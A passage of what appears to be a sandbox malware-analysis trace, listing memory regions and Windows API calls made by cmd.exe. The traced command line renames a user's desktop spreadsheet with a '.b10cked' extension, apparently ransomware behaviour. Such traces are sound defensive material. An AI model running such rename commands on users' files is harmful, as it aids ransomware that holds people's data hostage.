\"C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS\" \"C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14586 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" 
filename = "" Region: id = 14587 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14588 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14589 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 14590 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14591 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14592 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14593 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14594 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14595 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15810 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15811 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15812 start_va = 0x50000 end_va = 0xb6fff entry_point = 
0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15813 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 15814 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 15815 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15816 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15817 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15818 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15819 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15820 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15821 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" 
(normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15822 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15823 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15824 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 15825 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15826 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15827 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15828 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 15829 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 15830 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 15831 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 15832 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 15833 start_va = 0x1140000 
end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 212 os_tid = 0xd48 [0140.711] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfb4c | out: lpSystemTimeAsFileTime=0x2cfb4c*(dwLowDateTime=0x8dce28c0, dwHighDateTime=0x1d440a9)) [0140.711] GetCurrentProcessId () returned 0xdb0 [0140.712] GetCurrentThreadId () returned 0xd48 [0140.712] GetTickCount () returned 0x2c293 [0140.712] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfb44 | out: lpPerformanceCount=0x2cfb44*=19750089079) returned 1 [0140.713] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.713] __set_app_type (_Type=0x1) [0140.713] __p__fmode () returned 0x76b331f4 [0140.713] __p__commode () returned 0x76b331fc [0140.713] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.713] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.713] GetCurrentThreadId () returned 0xd48 [0140.713] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd48) returned 0x38 [0140.713] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.713] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.713] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.714] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfadc | out: phkResult=0x2cfadc*=0x0) returned 0x2 [0140.715] VirtualQuery (in: lpAddress=0x2cfb13, lpBuffer=0x2cfaac, dwLength=0x1c | out: lpBuffer=0x2cfaac*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, 
Protect=0x4, Type=0x20000)) returned 0x1c [0140.715] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfaac, dwLength=0x1c | out: lpBuffer=0x2cfaac*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.715] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfaac, dwLength=0x1c | out: lpBuffer=0x2cfaac*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.715] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfaac, dwLength=0x1c | out: lpBuffer=0x2cfaac*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.715] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfaac, dwLength=0x1c | out: lpBuffer=0x2cfaac*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0140.715] GetConsoleOutputCP () returned 0x1b5 [0140.715] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.715] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.715] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.715] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.716] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.716] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.716] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.716] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.716] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.716] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.716] 
GetEnvironmentStringsW () returned 0xe0170* [0140.716] FreeEnvironmentStringsW (penv=0xe0170) returned 1 [0140.717] GetEnvironmentStringsW () returned 0xe0170* [0140.717] FreeEnvironmentStringsW (penv=0xe0170) returned 1 [0140.717] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea4c | out: phkResult=0x2cea4c*=0x40) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x0, lpData=0x2cea58*=0x98, lpcbData=0x2cea50*=0x1000) returned 0x2 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x1, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x0, lpData=0x2cea58*=0x1, lpcbData=0x2cea50*=0x1000) returned 0x2 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x0, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x40, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x40, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, 
lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x0, lpData=0x2cea58*=0x40, lpcbData=0x2cea50*=0x1000) returned 0x2 [0140.717] RegCloseKey (hKey=0x40) returned 0x0 [0140.717] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea4c | out: phkResult=0x2cea4c*=0x40) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x0, lpData=0x2cea58*=0x40, lpcbData=0x2cea50*=0x1000) returned 0x2 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x1, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x0, lpData=0x2cea58*=0x1, lpcbData=0x2cea50*=0x1000) returned 0x2 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x0, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x9, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x9, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x0, 
lpData=0x2cea58*=0x9, lpcbData=0x2cea50*=0x1000) returned 0x2 [0140.718] RegCloseKey (hKey=0x40) returned 0x0 [0140.718] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.718] srand (_Seed=0x5b88636f) [0140.718] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS\" \"C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked\"" [0140.718] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS\" \"C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked\"" [0140.718] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.718] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe18d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.718] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.718] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.718] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.718] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.718] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.718] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.719] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.719] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.719] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.719] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.719] _wcsicmp 
(_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.719] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.719] GetEnvironmentStringsW () returned 0xe22c0* [0140.719] FreeEnvironmentStringsW (penv=0xe22c0) returned 1 [0140.719] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.719] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.719] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.719] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.719] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.719] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.719] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.719] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.719] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.719] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.719] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf818 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.719] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf818, lpFilePart=0x2cf814 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf814*="Desktop") returned 0x18 [0140.719] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.720] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf594 | out: lpFindFileData=0x2cf594) returned 0xe0000 [0140.720] FindClose (in: hFindFile=0xe0000 | out: hFindFile=0xe0000) returned 1 [0140.720] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf594 | out: lpFindFileData=0x2cf594) returned 0xe0000 [0140.720] FindClose (in: hFindFile=0xe0000 | out: 
hFindFile=0xe0000) returned 1 [0140.720] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf594 | out: lpFindFileData=0x2cf594) returned 0xe0000 [0140.720] FindClose (in: hFindFile=0xe0000 | out: hFindFile=0xe0000) returned 1 [0140.720] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.720] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.720] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.720] GetEnvironmentStringsW () returned 0xe2ae0* [0140.721] FreeEnvironmentStringsW (penv=0xe2ae0) returned 1 [0140.721] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.721] GetConsoleOutputCP () returned 0x1b5 [0140.721] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.721] GetUserDefaultLCID () returned 0x409 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf958, cchData=128 | out: lpLCData="0") returned 2 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf958, cchData=128 | out: lpLCData="0") returned 2 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf958, cchData=128 | out: lpLCData="1") returned 2 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.723] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.723] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.724] GetConsoleTitleW (in: lpConsoleTitle=0xd08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.724] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.724] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.724] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.724] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.725] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.725] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.725] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.725] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.725] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.725] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.725] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.728] GetConsoleTitleW (in: lpConsoleTitle=0x2cf650, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 
0x1b [0141.057] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.057] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.057] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.057] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.057] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.057] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.057] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.057] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.057] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.057] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.058] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.058] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.058] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.058] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.058] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.058] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.058] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.058] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.058] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.058] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.058] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.058] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.058] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.058] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.058] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.058] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.058] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.058] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.058] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.058] _wcsicmp (_String1="move", 
_String2="ENDLOCAL") returned 8 [0141.058] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.058] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.058] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.058] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.058] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.061] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.061] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.061] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf40c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf404, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf404*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 